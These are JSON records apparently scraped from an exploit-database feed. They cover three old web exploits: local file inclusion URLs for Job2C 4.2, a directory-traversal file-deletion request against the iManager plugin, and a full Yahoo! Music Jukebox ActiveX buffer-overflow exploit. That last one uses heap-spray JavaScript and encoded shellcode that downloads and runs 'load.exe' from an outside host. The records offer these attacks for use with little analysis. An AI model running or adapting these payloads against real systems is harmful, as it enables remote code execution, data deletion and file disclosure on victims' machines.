{"type": "zdt", "lastseen": "2016-04-19T03:42:18", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Job2C 4.2 (adtype) Local File Inclusion Vulnerability", "published": "2009-04-15T00:00:00", "href": "http://0day.today/exploit/description/5043", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "105bb1d1db2faefbb18f93c3b1bbc3311d43adfd38a832c64f026b89651853ed", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "=====================================================\r\nJob2C 4.2 (adtype) Local File Inclusion Vulnerability\r\n=====================================================\r\n\r\n\r\n[~] Job2C version 4.2 (adtype) MulTiple LFi\r\n[~]\r\n[~] Script: http://www.w2b.ru/download/Job2C.zip\r\n[~] ----------------------------------------------------------\r\n[~] Discovered By: ZoRLu\r\n[~]\r\n[~] Date: 15.04.2009\r\n[~]\r\n[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S Herkes Ustune AlInmasIn anlayan anladI :S\r\n[~]\r\n[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com\r\n[~] -----------------------------------------------------------\r\n\r\nfile: \r\n\r\nwindetail.php\r\n\r\nerr0r c0de:\r\n\r\n$adtype=$_REQUEST[\"adtype\"];\r\n$id=$_REQUEST[\"id\"]; ( err0r c0de 1 )\r\n$title=$_REQUEST[\"title\"];\r\n\r\n\twinHead($title);\r\n\tinclude(\"lib/\".$adtype.\".inc\"); ( err0r c0de 2 )\r\n\t\r\nexp 1:\r\n\t\r\nyildirimordulari.com/script/windetail.php?adtype=LFY%00\r\n\r\nfile:\r\n\r\ndetail.php\r\n\r\nerr0r c0de:\r\n\r\n$mode=$_REQUEST[\"mode\"];\r\n$adtype=$_REQUEST[\"adtype\"]; ( err0r c0de 1 )\r\n$id=$_REQUEST[\"id\"];\r\n$auth=$_SESSION[\"auth\"];\r\ninclude(\"conf/conf.inc\");\r\ninclude(\"lib/lib.inc\");\r\ninclude(\"lib/addlib.inc\");\r\ninclude(\"templates/header.inc\");\r\nif(!$adtype)$adtype=\"res\";\r\n\r\n\tinclude(\"lib/\".$adtype.\".inc\"); ( err0r c0de 1 )\t\r\n\t\r\n\r\nexp 2:\r\n\r\nyildirimordulari.com/script/detail.php?adtype=LFY%00\r\n\r\n\r\n[~] ----------------------------------------------------------------------\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-5043", "sourceHref": "http://0day.today/exploit/5043", "modified": "2009-04-15T00:00:00", "reporter": "ZoRLu", "enchantments": {"vulnersScore": 5.1}}

{"result": {"zdt": [{"lastseen": "2016-04-19T23:30:08", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "LiquidWorm", "published": "2011-09-16T00:00:00", "type": "zdt", "title": "iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-09-16T00:00:00", "href": "http://0day.today/exploit/description/16937", "id": "1337DAY-ID-16937", "sourceData": "iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability\r\n \r\n \r\nVendor: net4visions.com\r\nProduct web page: http://www.net4visions.com\r\nAffected version: <= 1.2.8 Build 02012008\r\n \r\nSummary: With iManager you can manage your files/images on your webserver,\r\nand it provides user interface to most of the phpThumb() functions. It works\r\neither stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW,\r\nhtmlAREA, Xinha and FCKeditor.\r\n \r\nDesc: Input passed to the 'd' parameter in /scripts/phpCrop/crop.php is not\r\nproperly sanitised before being used to delete files. This can be exploited\r\nto delete files with the permissions of the web server via directory traversal\r\nsequences passed within the 'd' parameter.\r\n \r\n \r\n======================================================================\r\n/scripts/phpCrop/crop.php:\r\n----------------------------------------------------------------------\r\n \r\n32: if( isset($_REQUEST['s']) ) {\r\n33: //delete previous temp files \r\n34: $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE); \r\n35: if ( is_array ( $matches ) ) {\r\n36: foreach ( $matches as $fn) {\r\n37: @unlink($fn);\r\n38: }\r\n39: }\r\n \r\n======================================================================\r\n \r\n \r\nTested on: Microsoft Windows XP Professional SP3 (EN)\r\n Apache 2.2.14 (Win32)\r\n PHP 5.3.1\r\n MySQL 5.1.41\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n liquidworm gmail com\r\n \r\n \r\nAdvisory ID: ZSL-2011-5043\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php\r\n \r\n \r\n15.09.2011\r\n \r\n--\r\n \r\n \r\nhttp://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00\r\n\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/16937"}, {"lastseen": "2016-04-20T01:44:54", "references": [], "description": "Exploit for unknown platform in category remote exploits", "edition": 1, "reporter": "n/a", "published": "2008-02-03T00:00:00", "type": "zdt", "title": "Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BOF Exploit", "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-02-03T00:00:00", "href": "http://0day.today/exploit/description/9131", "id": "1337DAY-ID-9131", "sourceData": "==============================================================\r\nYahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BOF Exploit\r\n==============================================================\r\n\r\n<?php\r\n\r\n\t// 0x48k-ymj by ...\r\n\t// based on /5043\r\n\t// Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>\r\n\r\n\r\n\tfunction unescape($s){\r\n\t\t$res=strtoupper(bin2hex($s));\r\n\t\t$g = round(strlen($res)/4);\r\n\t\tif ($g != (strlen($res)/4))$res.=\"00\";\r\n\t\t$out = \"\";\r\n\t\tfor ($i=0; $i<strlen($res);$i+=4)$out.=\"%u\".substr($res, $i+2, 2).substr($res, $i, 2);\r\n\t\treturn $out;\r\n\t}\r\n\r\n\techo '\r\n\t\t<html>\r\n\t\t<body>\r\n\t\t<object id=\"obj\" classid=\"clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C\"></object>\r\n\t\t<script language=\"JavaScript\">\r\n\r\n\t\t\tfunction gsc(){\r\n\t\t\t\tvar hsta = 0x0c0c0c0c;\r\n\t\t\t\tvar plc = unescape(\"%u4343%u4343\"+\r\n\t\t\t\t\"%u0feb%u335b%u66c9%u80b9%u8001%uef33\"+\r\n\t\t\t\t\"%ue243%uebfa%ue805%uffec%uffff%u8b7f\"+\r\n\t\t\t\t\"%udf4e%uefef%u64ef%ue3af%u9f64%u42f3\"+\r\n\t\t\t\t\"%u9f64%u6ee7%uef03%uefeb%u64ef%ub903\"+\r\n\t\t\t\t\"%u6187%ue1a1%u0703%uef11%uefef%uaa66\"+\r\n\t\t\t\t\"%ub9eb%u7787%u6511%u07e1%uef1f%uefef\"+\r\n\t\t\t\t\"%uaa66%ub9e7%uca87%u105f%u072d%uef0d\"+\r\n\t\t\t\t\"%uefef%uaa66%ub9e3%u0087%u0f21%u078f\"+\r\n\t\t\t\t\"%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96\"+\r\n\t\t\t\t\"%u0757%uef29%uefef%uaa66%uaffb%ud76f\"+\r\n\t\t\t\t\"%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef\"+\r\n\t\t\t\t\"%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba\"+\r\n\t\t\t\t\"%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0\"+\r\n\t\t\t\t\"%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c\"+\r\n\t\t\t\t\"%u66bf%ucfaa%u1087%uefef%ubfef%uaa64\"+\r\n\t\t\t\t\"%u85fb%ub6ed%uba64%u07f7%uef8e%uefef\"+\r\n\t\t\t\t\"%uaaec%u28cf%ub3ef%uc191%u288a%uebaf\"+\r\n\t\t\t\t\"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85\"+\r\n\t\t\t\t\"%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8\"+\r\n\t\t\t\t\"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf\"+\r\n\t\t\t\t\"%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc\"+\r\n\t\t\t\t\"%uefef%uef85%u9a10%u64cf%ue7aa%ued85\"+\r\n\t\t\t\t\"%u64b6%uf7ba%uff07%uefef%u85ef%u6410\"+\r\n\t\t\t\t\"%uffaa%uee85%u64b6%uf7ba%uef07%uefef\"+\r\n\t\t\t\t\"%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec\"+\r\n\t\t\t\t\"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10\"+\r\n\t\t\t\t\"%u64ba%u6403%ue792%ub264%ub9e3%u9c64\"+\r\n\t\t\t\t\"%u64d3%uf19b%uec97%ub91c%u9964%ueccf\"+\r\n\t\t\t\t\"%udc1c%ua626%u42ae%u2cec%udcb9%ue019\"+\r\n\t\t\t\t\"%uff51%u1dd5%ue79b%u212e%uece2%uaf1d\"+\r\n\t\t\t\t\"%u1e04%u11d4%u9ab1%ub50a%u0464%ub564\"+\r\n\t\t\t\t\"%ueccb%u8932%ue364%u64a4%uf3b5%u32ec\"+\r\n\t\t\t\t\"%ueb64%uec64%ub12a%u2db2%uefe7%u1b07\"+\r\n\t\t\t\t\"%u1011%uba10%ua3bd%ua0a2%uefa1\"+\r\n\t\t\t\t\"'.unescape(\"http://site.come/load.exe\").'\");\r\n\t\t\t\tvar hbs=0x400000;\r\n\t\t\t\tvar pls=plc.length*2;\r\n\t\t\t\tvar sss=hbs-(pls+0x38);\r\n\t\t\t\tvar ss=unescape(\"%u0c0c%u0c0c\");\r\n\t\t\t\tss=gss(ss,sss);\r\n\t\t\t\thbs=(hsta-0x400000)/hbs;\r\n\t\t\t\tfor(i=0;i<hbs;i++)m[i]=ss+plc;\r\n\t\t\t}\r\n\t\t\tfunction gss(ss,sss){\r\n\t\t\t\twhile(ss.length<sss*2)ss+=ss;\r\n\t\t\t\tss=ss.substring(0,sss);\r\n\t\t\t\treturn ss;\r\n\t\t\t}\r\n\t\t\tvar m=new Array();\r\n\t\t\tgsc();\r\n\t\t\ttry{\r\n\t\t\t\tvar tmp=gss(unescape(\"%u0c0c%u0c0c\"),340);\r\n\t\t\t\tobj.AddImage(\"http://\"+tmp,1);\r\n\t\t\t}catch(e){}\r\n\t\t</script>\r\n\t\t</body>\r\n\t\t</html>\r\n\t';\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/9131"}]}}